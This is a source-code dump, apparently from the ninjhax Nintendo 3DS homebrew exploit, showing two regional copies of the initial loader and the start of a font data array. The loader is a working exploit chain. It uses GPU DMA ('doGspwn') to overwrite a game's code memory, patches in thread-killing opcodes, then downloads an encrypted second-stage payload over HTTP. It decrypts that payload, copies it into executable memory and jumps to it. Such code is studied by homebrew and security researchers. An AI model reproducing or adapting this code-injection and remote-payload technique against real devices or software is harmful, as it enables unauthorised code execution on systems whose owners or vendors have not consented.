 29 | {
 30 | 	u32* cmdbuf=getThreadCommandBuffer();
 31 | 
 32 | 	cmdbuf[0]=0x10044; //request header code
 33 | 	cmdbuf[1]=0x1000; //unk
 34 | 	cmdbuf[2]=0x20; //unk
 35 | 	
 36 | 	Result ret=0;
 37 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 38 | 
 39 | 	return cmdbuf[1];
 40 | }
 41 | 
 42 | Result HTTPC_CreateContext(Handle handle, char* url, Handle* contextHandle)
 43 | {
 44 | 	u32* cmdbuf=getThreadCommandBuffer();
 45 | 	u32 l=_strlen(url)+1;
 46 | 
 47 | 	cmdbuf[0]=0x20082; //request header code
 48 | 	cmdbuf[1]=l;
 49 | 	cmdbuf[2]=0x01; //unk
 50 | 	cmdbuf[3]=(l<<4)|0xA;
 51 | 	cmdbuf[4]=(u32)url;
 52 | 	
 53 | 	Result ret=0;
 54 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 55 | 	
 56 | 	if(contextHandle)*contextHandle=cmdbuf[2];
 57 | 
 58 | 	return cmdbuf[1];
 59 | }
 60 | 
 61 | Result HTTPC_InitializeConnectionSession(Handle handle, Handle contextHandle)
 62 | {
 63 | 	u32* cmdbuf=getThreadCommandBuffer();
 64 | 
 65 | 	cmdbuf[0]=0x80042; //request header code
 66 | 	cmdbuf[1]=contextHandle;
 67 | 	cmdbuf[2]=0x20; //unk, fixed to that in code
 68 | 	
 69 | 	Result ret=0;
 70 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 71 | 
 72 | 	return cmdbuf[1];
 73 | }
 74 | 
 75 | Result HTTPC_SetProxyDefault(Handle handle, Handle contextHandle)
 76 | {
 77 | 	u32* cmdbuf=getThreadCommandBuffer();
 78 | 
 79 | 	cmdbuf[0]=0xe0040; //request header code
 80 | 	cmdbuf[1]=contextHandle;
 81 | 	
 82 | 	Result ret=0;
 83 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 84 | 
 85 | 	return cmdbuf[1];
 86 | }
 87 | 
 88 | Result HTTPC_CloseContext(Handle handle, Handle contextHandle)
 89 | {
 90 | 	u32* cmdbuf=getThreadCommandBuffer();
 91 | 
 92 | 	cmdbuf[0]=0x30040; //request header code
 93 | 	cmdbuf[1]=contextHandle;
 94 | 	
 95 | 	Result ret=0;
 96 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 97 | 
 98 | 	return cmdbuf[1];
 99 | }
100 | 
101 | Result HTTPC_BeginRequest(Handle handle, Handle contextHandle)
102 | {
103 | 	u32* cmdbuf=getThreadCommandBuffer();
104 | 
105 | 	cmdbuf[0]=0x90040; //request header code
106 | 	cmdbuf[1]=contextHandle;
107 | 	
108 | 	Result ret=0;
109 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
110 | 
111 | 	return cmdbuf[1];
112 | }
113 | 
114 | Result HTTPC_ReceiveData(Handle handle, Handle contextHandle, u8* buffer, u32 size)
115 | {
116 | 	u32* cmdbuf=getThreadCommandBuffer();
117 | 
118 | 	cmdbuf[0]=0xB0082; //request header code
119 | 	cmdbuf[1]=contextHandle;
120 | 	cmdbuf[2]=size;
121 | 	cmdbuf[3]=(size<<4)|12;
122 | 	cmdbuf[4]=(u32)buffer;
123 | 	
124 | 	Result ret=0;
125 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
126 | 
127 | 	return cmdbuf[1];
128 | }
129 | 
130 | Result HTTPC_GetDownloadSizeState(Handle handle, Handle contextHandle, u32* totalSize)
131 | {
132 | 	u32* cmdbuf=getThreadCommandBuffer();
133 | 
134 | 	cmdbuf[0]=0x00060040; //request header code
135 | 	cmdbuf[1]=contextHandle;
136 | 	
137 | 	Result ret=0;
138 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
139 | 
140 | 	if(totalSize)*totalSize=cmdbuf[3];
141 | 
142 | 	return cmdbuf[1];
143 | }
144 | 
145 | Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server)
146 | {
147 | 	u8 l=_strlen(server);
148 | 	if(!out || !server || l>8)return -1;
149 | 
150 | 	u32* cmdbuf=getThreadCommandBuffer();
151 | 
152 | 	cmdbuf[0]=0x50100; //request header code
153 | 	_strcpy((char*)&cmdbuf[1], server);
154 | 	cmdbuf[3]=l;
155 | 	cmdbuf[4]=0x0;
156 | 
157 | 	Result ret=0;
158 | 	if((ret=svc_sendSyncRequest(*handleptr)))return ret;
159 | 
160 | 	*out=cmdbuf[3];
161 | 
162 | 	return cmdbuf[1];
163 | }
164 | 
165 | // const u8 hexTable[]=
166 | // {
167 | // 	'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'
168 | // };
169 | 
170 | // void hex2str(char* out, u32 val)
171 | // {
172 | // 	int i;
173 | // 	for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;}
174 | // 	out[8]=0x00;
175 | // }
176 | 
177 | // void drawHex(u32 val, int x, int y)
178 | // {
179 | // 	char str[9];
180 | 
181 | // 	hex2str(str,val);
182 | // 	drawString(TOPFBADR1,str,x,y);
183 | // 	drawString(TOPFBADR2,str,x,y);
184 | // }
185 | 
186 | void doGspwn(u32* src, u32* dst, u32 size)
187 | {
188 | 	Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAdr)=(void*)CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue;
189 | 	u32 gxCommand[]=
190 | 	{
191 | 		0x00000004, //command header (SetTextureCopy)
192 | 		(u32)src, //source address
193 | 		(u32)dst, //destination address
194 | 		size, //size
195 | 		0xFFFFFFFF, // dim in
196 | 		0xFFFFFFFF, // dim out
197 | 		0x00000008, // flags
198 | 		0x00000000, //unused
199 | 	};
200 | 
201 | 	u32** sharedGspCmdBuf=(u32**)(CN_GSPSHAREDBUF_ADR);
202 | 	nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand);
203 | }
204 | 
205 | Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size)
206 | {
207 | 	u32* cmdbuf=getThreadCommandBuffer();
208 | 
209 | 	cmdbuf[0]=0x00090082;
210 | 	cmdbuf[1]=(u32)addr;
211 | 	cmdbuf[2]=size;
212 | 	cmdbuf[3]=0x00000000;
213 | 	cmdbuf[4]=(u32)kprocess;
214 | 
215 | 	Result ret=0;
216 | 	if((ret=svc_sendSyncRequest(*handle)))return ret;
217 | 
218 | 	return cmdbuf[1];
219 | }
220 | 
221 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end)
222 | {
223 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
224 | 
225 | 	int i;
226 | 	_GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
227 | 	doGspwn((u32*)(dst), (u32*)(0x14100000), 0x200);
228 | 	svc_sleepThread(0x100000);
229 | 	for(i=start;i<end;i++)((u32*)0x14100000)[i]=0xEF000009;
230 | 	_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
231 | 	doGspwn((u32*)(0x14100000), (u32*)(dst), 0x200);
232 | 	svc_sleepThread(0x100000);
233 | }
234 | 
235 | u32 computeCodeAddress(u32 offset)
236 | {
237 | 	return CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+FIRM_APPMEMALLOC+offset;
238 | }
239 | 
240 | int _main()
241 | {
242 | 	Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
243 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
244 | 
245 | 	for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
246 | 	// drawString(TOPFBADR1,"ninjhaxx",0,0);
247 | 	// drawString(TOPFBADR2,"ninjhaxx",0,0);
248 | 
249 | 	Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
250 | 
251 | 	int line=10;
252 | 	Result ret;
253 | 
254 | 	Handle* addressArbiterHandle=(Handle*)0x003414B0;
255 | 
256 | 	Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002C3A78;
257 | 	Handle** dspHandle=(Handle**)0x341A4C;
258 | 
259 | 	_DSP_UnloadComponent(*dspHandle);
260 | 
261 | 	//close threads
262 | 		//patch gsp event handler addr to kill gsp thread ASAP
263 | 		*((u32*)(0x362DA8+0x10+4*0x4))=0x002B5D14; //svc 0x9 addr
264 | 
265 | 		//patch waitSyncN
266 | 		patchMem(gspHandle, computeCodeAddress(0x0019BD00), 0x200, 0xB, 0x41);
267 | 		patchMem(gspHandle, computeCodeAddress(0x0019C000), 0x200, 0x39, 0x45);
268 | 		patchMem(gspHandle, computeCodeAddress(0x001D3700), 0x200, 0x7, 0x1A);
269 | 		// patchMem(gspHandle, computeCodeAddress(0x000C9100), 0x200, 0x2E, 0x44);
270 | 		// patchMem(gspHandle, computeCodeAddress(0x000EFE00), 0x200, 0x2C, 0x31);
271 | 
272 | 		//patch arbitrateAddress
273 | 		patchMem(gspHandle, computeCodeAddress(0x001D3300), 0x200, 0x10, 0x3C);
274 | 
275 | 		//wake threads
276 | 		svc_arbitrateAddress(*addressArbiterHandle, 0x364ccc, 0, -1, 0);
277 | 		svc_signalEvent(((Handle*)0x354ba8)[2]);
278 | 		s32 out; svc_releaseSemaphore(&out, *(Handle*)0x341AB0, 1); //CHECK !
279 | 
280 | 		//kill thread5 without panicking the kernel...
281 | 		*(u8*)(0x3664D8+0xd)=0x00;
282 | 
283 | 	svc_sleepThread(0x10000000);
284 | 
285 | 	Handle httpcHandle;
286 | 	ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
287 | 
288 | 	// drawHex(ret,0,line+=10);
289 | 	// drawHex(httpcHandle,0,line+=10);
290 | 
291 | 	Handle httpContextHandle=0x00;
292 | 
293 | 	ret=HTTPC_Initialize(httpcHandle);
294 | 
295 | 	// drawHex(ret,0,line+=10);
296 | 
297 | 	ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL FIRM_VERSION "_" CN_VERSION "_" MENU_VERSION ".bin", &httpContextHandle);
298 | 
299 | 	// drawHex(ret,0,line+=10);
300 | 	
301 | 	Handle httpcHandle2;
302 | 	ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
303 | 
304 | 	ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
305 | 	ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle);
306 | 
307 | 	// drawHex(ret,0,line+=10);
308 | 
309 | 	ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
310 | 
311 | 	// drawHex(ret,0,line+=10);
312 | 
313 | 	u8* buffer0=(u8*)0x14300000;
314 | 	u8* buffer1=(u8*)0x14100000;
315 | 	u32 secondaryPayloadSize=0x0;
316 | 	ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
317 | 	ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
318 | 
319 | 	// drawHex(ret,0,line+=10);
320 | 
321 | 	HTTPC_CloseContext(httpcHandle2, httpContextHandle);
322 | 
323 | 	//TODO : modify key/parray first ?
324 | 	//(use some of its slots as variables in ROP to confuse people ?)
325 | 	//decrypt secondary payload
326 | 	Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A5900;
327 | 	Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A5F48;
328 | 
329 | 	blowfishKeyScheduler((u32*)0x14200000);
330 | 	blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
331 | 
332 | 	ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer1, 0x300000);
333 | 	// drawHex(ret,0,line+=10);
334 | 
335 | 	doGspwn((u32*)(buffer1), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
336 | 
337 | 	svc_sleepThread(0x3B9ACA00);
338 | 
339 | 	// drawString(TOPFBADR1,"ninjhax2",100,0);
340 | 	// drawString(TOPFBADR2,"ninjhax2",100,0);
341 | 
342 | 	void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
343 | 	reset(secondaryPayloadSize);
344 | 
345 | 	return 0;
346 | }
347 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/WEST/cn_initial/source/main.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | #include <ctr/types.h>
  5 | #include <ctr/srv.h>
  6 | #include <ctr/svc.h>
  7 | #include "text.h"
  8 | 
  9 | #include "../../../../build/constants.h"
 10 | 
 11 | #define TOPFBADR1 ((u8*)CN_TOPFBADR1)
 12 | #define TOPFBADR2 ((u8*)CN_TOPFBADR2)
 13 | 
 14 | int _strlen(char* str)
 15 | {
 16 | 	int l=0;
 17 | 	while(*(str++))l++;
 18 | 	return l;
 19 | }
 20 | 
 21 | void _strcpy(char* dst, char* src)
 22 | {
 23 | 	while(*src)*(dst++)=*(src++);
 24 | 	*dst=0x00;
 25 | }
 26 | 
 27 | //?
 28 | Result HTTPC_Initialize(Handle handle)
 29 | {
 30 | 	u32* cmdbuf=getThreadCommandBuffer();
 31 | 
 32 | 	cmdbuf[0]=0x10044; //request header code
 33 | 	cmdbuf[1]=0x1000; //unk
 34 | 	cmdbuf[2]=0x20; //unk
 35 | 	
 36 | 	Result ret=0;
 37 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 38 | 
 39 | 	return cmdbuf[1];
 40 | }
 41 | 
 42 | Result HTTPC_CreateContext(Handle handle, char* url, Handle* contextHandle)
 43 | {
 44 | 	u32* cmdbuf=getThreadCommandBuffer();
 45 | 	u32 l=_strlen(url)+1;
 46 | 
 47 | 	cmdbuf[0]=0x20082; //request header code
 48 | 	cmdbuf[1]=l;
 49 | 	cmdbuf[2]=0x01; //unk
 50 | 	cmdbuf[3]=(l<<4)|0xA;
 51 | 	cmdbuf[4]=(u32)url;
 52 | 	
 53 | 	Result ret=0;
 54 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 55 | 	
 56 | 	if(contextHandle)*contextHandle=cmdbuf[2];
 57 | 
 58 | 	return cmdbuf[1];
 59 | }
 60 | 
 61 | Result HTTPC_InitializeConnectionSession(Handle handle, Handle contextHandle)
 62 | {
 63 | 	u32* cmdbuf=getThreadCommandBuffer();
 64 | 
 65 | 	cmdbuf[0]=0x80042; //request header code
 66 | 	cmdbuf[1]=contextHandle;
 67 | 	cmdbuf[2]=0x20; //unk, fixed to that in code
 68 | 	
 69 | 	Result ret=0;
 70 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 71 | 
 72 | 	return cmdbuf[1];
 73 | }
 74 | 
 75 | Result HTTPC_SetProxyDefault(Handle handle, Handle contextHandle)
 76 | {
 77 | 	u32* cmdbuf=getThreadCommandBuffer();
 78 | 
 79 | 	cmdbuf[0]=0xe0040; //request header code
 80 | 	cmdbuf[1]=contextHandle;
 81 | 	
 82 | 	Result ret=0;
 83 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 84 | 
 85 | 	return cmdbuf[1];
 86 | }
 87 | 
 88 | Result HTTPC_CloseContext(Handle handle, Handle contextHandle)
 89 | {
 90 | 	u32* cmdbuf=getThreadCommandBuffer();
 91 | 
 92 | 	cmdbuf[0]=0x30040; //request header code
 93 | 	cmdbuf[1]=contextHandle;
 94 | 	
 95 | 	Result ret=0;
 96 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
 97 | 
 98 | 	return cmdbuf[1];
 99 | }
100 | 
101 | Result HTTPC_BeginRequest(Handle handle, Handle contextHandle)
102 | {
103 | 	u32* cmdbuf=getThreadCommandBuffer();
104 | 
105 | 	cmdbuf[0]=0x90040; //request header code
106 | 	cmdbuf[1]=contextHandle;
107 | 	
108 | 	Result ret=0;
109 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
110 | 
111 | 	return cmdbuf[1];
112 | }
113 | 
114 | Result HTTPC_ReceiveData(Handle handle, Handle contextHandle, u8* buffer, u32 size)
115 | {
116 | 	u32* cmdbuf=getThreadCommandBuffer();
117 | 
118 | 	cmdbuf[0]=0xB0082; //request header code
119 | 	cmdbuf[1]=contextHandle;
120 | 	cmdbuf[2]=size;
121 | 	cmdbuf[3]=(size<<4)|12;
122 | 	cmdbuf[4]=(u32)buffer;
123 | 	
124 | 	Result ret=0;
125 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
126 | 
127 | 	return cmdbuf[1];
128 | }
129 | 
130 | Result HTTPC_GetDownloadSizeState(Handle handle, Handle contextHandle, u32* totalSize)
131 | {
132 | 	u32* cmdbuf=getThreadCommandBuffer();
133 | 
134 | 	cmdbuf[0]=0x00060040; //request header code
135 | 	cmdbuf[1]=contextHandle;
136 | 	
137 | 	Result ret=0;
138 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
139 | 
140 | 	if(totalSize)*totalSize=cmdbuf[3];
141 | 
142 | 	return cmdbuf[1];
143 | }
144 | 
145 | Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server)
146 | {
147 | 	u8 l=_strlen(server);
148 | 	if(!out || !server || l>8)return -1;
149 | 
150 | 	u32* cmdbuf=getThreadCommandBuffer();
151 | 
152 | 	cmdbuf[0]=0x50100; //request header code
153 | 	_strcpy((char*)&cmdbuf[1], server);
154 | 	cmdbuf[3]=l;
155 | 	cmdbuf[4]=0x0;
156 | 
157 | 	Result ret=0;
158 | 	if((ret=svc_sendSyncRequest(*handleptr)))return ret;
159 | 
160 | 	*out=cmdbuf[3];
161 | 
162 | 	return cmdbuf[1];
163 | }
164 | 
165 | // const u8 hexTable[]=
166 | // {
167 | // 	'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'
168 | // };
169 | 
170 | // void hex2str(char* out, u32 val)
171 | // {
172 | // 	int i;
173 | // 	for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;}
174 | // 	out[8]=0x00;
175 | // }
176 | 
177 | // void drawHex(u32 val, int x, int y)
178 | // {
179 | // 	char str[9];
180 | 
181 | // 	hex2str(str,val);
182 | // 	drawString(TOPFBADR1,str,x,y);
183 | // 	drawString(TOPFBADR2,str,x,y);
184 | // }
185 | 
186 | void doGspwn(u32* src, u32* dst, u32 size)
187 | {
188 | 	Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAdr)=(void*)CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue;
189 | 	u32 gxCommand[]=
190 | 	{
191 | 		0x00000004, //command header (SetTextureCopy)
192 | 		(u32)src, //source address
193 | 		(u32)dst, //destination address
194 | 		size, //size
195 | 		0xFFFFFFFF, // dim in
196 | 		0xFFFFFFFF, // dim out
197 | 		0x00000008, // flags
198 | 		0x00000000, //unused
199 | 	};
200 | 
201 | 	u32** sharedGspCmdBuf=(u32**)(CN_GSPSHAREDBUF_ADR);
202 | 	nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand);
203 | }
204 | 
205 | Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size)
206 | {
207 | 	u32* cmdbuf=getThreadCommandBuffer();
208 | 
209 | 	cmdbuf[0]=0x00090082;
210 | 	cmdbuf[1]=(u32)addr;
211 | 	cmdbuf[2]=size;
212 | 	cmdbuf[3]=0x00000000;
213 | 	cmdbuf[4]=(u32)kprocess;
214 | 
215 | 	Result ret=0;
216 | 	if((ret=svc_sendSyncRequest(*handle)))return ret;
217 | 
218 | 	return cmdbuf[1];
219 | }
220 | 
221 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end)
222 | {
223 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
224 | 
225 | 	int i;
226 | 	_GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
227 | 	doGspwn((u32*)(dst), (u32*)(0x14100000), 0x200);
228 | 	svc_sleepThread(0x100000);
229 | 	for(i=start;i<end;i++)((u32*)0x14100000)[i]=0xEF000009;
230 | 	_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
231 | 	doGspwn((u32*)(0x14100000), (u32*)(dst), 0x200);
232 | 	svc_sleepThread(0x100000);
233 | }
234 | 
235 | u32 computeCodeAddress(u32 offset)
236 | {
237 | 	return CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+FIRM_APPMEMALLOC+offset;
238 | }
239 | 
240 | int _main()
241 | {
242 | 	Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
243 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
244 | 
245 | 	for(int i=0; i<0x46500*2;i++)((u8*)CN_TOPFBADR1)[i]=0x00;
246 | 	// drawString(TOPFBADR1,"ninjhaxx",0,0);
247 | 	// drawString(TOPFBADR2,"ninjhaxx",0,0);
248 | 
249 | 	Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
250 | 
251 | 	int line=10;
252 | 	Result ret;
253 | 
254 | 	Handle* addressArbiterHandle=(Handle*)0x334960;
255 | 
256 | 	Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
257 | 	Handle** dspHandle=(Handle**)0x334EFC;
258 | 
259 | 	_DSP_UnloadComponent(*dspHandle);
260 | 
261 | 	//close threads
262 | 		//patch gsp event handler addr to kill gsp thread ASAP
263 | 		*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
264 | 
265 | 		//patch waitSyncN
266 | 		patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
267 | 		patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
268 | 		patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
269 | 		// patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
270 | 
271 | 		//patch arbitrateAddress
272 | 		patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
273 | 
274 | 		//wake threads
275 | 		svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
276 | 		svc_signalEvent(((Handle*)0x3480d0)[2]);
277 | 		s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
278 | 
279 | 		//kill thread5 without panicking the kernel...
280 | 		*(u8*)0x359935=0x00;
281 | 
282 | 	svc_sleepThread(0x10000000);
283 | 
284 | 	Handle httpcHandle;
285 | 	ret=_srv_getServiceHandle(srvHandle, &httpcHandle, "http:C");
286 | 
287 | 	// drawHex(ret,0,line+=10);
288 | 	// drawHex(httpcHandle,0,line+=10);
289 | 
290 | 	Handle httpContextHandle=0x00;
291 | 
292 | 	ret=HTTPC_Initialize(httpcHandle);
293 | 
294 | 	// drawHex(ret,0,line+=10);
295 | 
296 | 	ret=HTTPC_CreateContext(httpcHandle, CN_NINJHAX_URL FIRM_VERSION "_" CN_VERSION "_" MENU_VERSION ".bin", &httpContextHandle);
297 | 
298 | 	// drawHex(ret,0,line+=10);
299 | 	
300 | 	Handle httpcHandle2;
301 | 	ret=_srv_getServiceHandle(srvHandle, &httpcHandle2, "http:C");
302 | 	if(ret)*(u32*)NULL=0xC0DE0001;
303 | 
304 | 	ret=HTTPC_InitializeConnectionSession(httpcHandle2, httpContextHandle);
305 | 	if(ret)*(u32*)NULL=0xC0DE0002;
306 | 	ret=HTTPC_SetProxyDefault(httpcHandle2, httpContextHandle);
307 | 	if(ret)*(u32*)NULL=0xC0DE0003;
308 | 
309 | 	// drawHex(ret,0,line+=10);
310 | 
311 | 	ret=HTTPC_BeginRequest(httpcHandle2, httpContextHandle);
312 | 	if(ret)*(u32*)NULL=0xC0DE0004;
313 | 
314 | 	// drawHex(ret,0,line+=10);
315 | 
316 | 	u8* buffer0=(u8*)0x14300000;
317 | 	u8* buffer1=(u8*)0x14100000;
318 | 	u32 secondaryPayloadSize=0x0;
319 | 	ret=HTTPC_ReceiveData(httpcHandle2, httpContextHandle, buffer0, 0x300000);
320 | 	if(ret)*(u32*)NULL=0xC0DE0005;
321 | 	ret=HTTPC_GetDownloadSizeState(httpcHandle2, httpContextHandle, &secondaryPayloadSize);
322 | 	if(ret)*(u32*)NULL=0xC0DE0006;
323 | 
324 | 	// drawHex(ret,0,line+=10);
325 | 
326 | 	HTTPC_CloseContext(httpcHandle2, httpContextHandle);
327 | 	if(ret)*(u32*)NULL=0xC0DE0007;
328 | 
329 | 	//TODO : modify key/parray first ?
330 | 	//(use some of its slots as variables in ROP to confuse people ?)
331 | 	//decrypt secondary payload
332 | 	Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A44BC;
333 | 	Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A4B04;
334 | 
335 | 	blowfishKeyScheduler((u32*)0x14200000);
336 | 	blowfishDecrypt((u32*)0x14200000, (u32*)buffer0, (u32*)buffer1, secondaryPayloadSize);
337 | 
338 | 	ret=_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)buffer1, 0x300000);
339 | 	// drawHex(ret,0,line+=10);
340 | 
341 | 	doGspwn((u32*)(buffer1), (u32*)computeCodeAddress(CN_3DSX_LOADADR-0x00100000), 0x0000A000);
342 | 
343 | 	svc_sleepThread(0x3B9ACA00);
344 | 
345 | 	// drawString(TOPFBADR1,"ninjhax2",100,0);
346 | 	// drawString(TOPFBADR2,"ninjhax2",100,0);
347 | 
348 | 	// //close thread handles
349 | 	// ret=svc_closeHandle(*((Handle*)0x359938));
350 | 	// ret=svc_closeHandle(*((Handle*)0x34FEA4));
351 | 	// ret=svc_closeHandle(*((Handle*)0x356274));
352 | 	// ret=svc_closeHandle(*((Handle*)0x334730));
353 | 	// ret=svc_closeHandle(*((Handle*)0x334F64));
354 | 
355 | 	void (*reset)(u32 size)=(void*)CN_3DSX_LOADADR;
356 | 	reset(secondaryPayloadSize);
357 | 
358 | 	return 0;
359 | }
360 | 


--------------------------------------------------------------------------------
/cn_secondary_payload/source/font.c:
--------------------------------------------------------------------------------
  1 | #include <ctr/types.h>
  2 | 
  3 | // const u8 font_bin[2640] = {
  4 | const u8 font_bin[] = {
  5 | 	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x1A,
  6 | 	0x78, 0x60, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00, 0x00, 0x70, 0x00, 0x00,
  7 | 	0x14, 0x7F, 0x7F, 0x14, 0x14, 0x7F, 0x7F, 0x14, 0x00, 0x12, 0x3A, 0x6B,
  8 | 	0x6B, 0x2E, 0x24, 0x00, 0x00, 0x63, 0x66, 0x0C, 0x98, 0x33, 0x63, 0x00,
  9 | 	0x00, 0x26, 0x7F, 0x59, 0x59, 0x77, 0x27, 0x05, 0x00, 0x10, 0x30, 0x60,
 10 | 	0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3C, 0x66, 0x42, 0x00, 0x00,
 11 | 	0x00, 0x00, 0x42, 0x66, 0x3C, 0x18, 0x00, 0x00, 0x10, 0x54, 0x7C, 0x38,
 12 | 	0x38, 0x7C, 0x54, 0x10, 0x00, 0x10, 0x10, 0x7C, 0x7C, 0x10, 0x10, 0x00,
 13 | 	0x00, 0x00, 0x02, 0x0E, 0x0C, 0x00, 0x00, 0x00, 0x00, 0x10, 0x10, 0x10,
 14 | 	0x10, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x06, 0x00, 0x00, 0x00,
 15 | 	0x00, 0x02, 0x06, 0x0C, 0x18, 0x30, 0x60, 0x00, 0x00, 0x3C, 0x7E, 0x4A,
 16 | 	0x52, 0x7E, 0x3C, 0x00, 0x00, 0x02, 0x22, 0x7E, 0x7E, 0x02, 0x02, 0x00,
 17 | 	0x00, 0x26, 0x4E, 0x4A, 0x52, 0x72, 0x22, 0x00, 0x00, 0x24, 0x46, 0x52,
 18 | 	0x52, 0x7E, 0x2C, 0x00, 0x00, 0x18, 0x78, 0x68, 0x08, 0x7E, 0x7E, 0x08,
 19 | 	0x00, 0x74, 0x76, 0x52, 0x52, 0x5E, 0x5C, 0x00, 0x00, 0x3C, 0x7E, 0x52,
 20 | 	0x52, 0x5E, 0x0C, 0x00, 0x00, 0x40, 0x40, 0x4E, 0x7E, 0x70, 0x40, 0x00,
 21 | 	0x00, 0x2C, 0x7E, 0x52, 0x52, 0x7E, 0x2C, 0x00, 0x00, 0x24, 0x76, 0x52,
 22 | 	0x52, 0x7E, 0x3C, 0x00, 0x00, 0x00, 0x00, 0x22, 0x22, 0x00, 0x00, 0x00,
 23 | 	0x00, 0x00, 0x02, 0x2E, 0x2C, 0x00, 0x00, 0x00, 0x00, 0x18, 0x3C, 0x24,
 24 | 	0x66, 0x42, 0x42, 0x00, 0x00, 0x28, 0x28, 0x28, 0x28, 0x28, 0x00, 0x00,
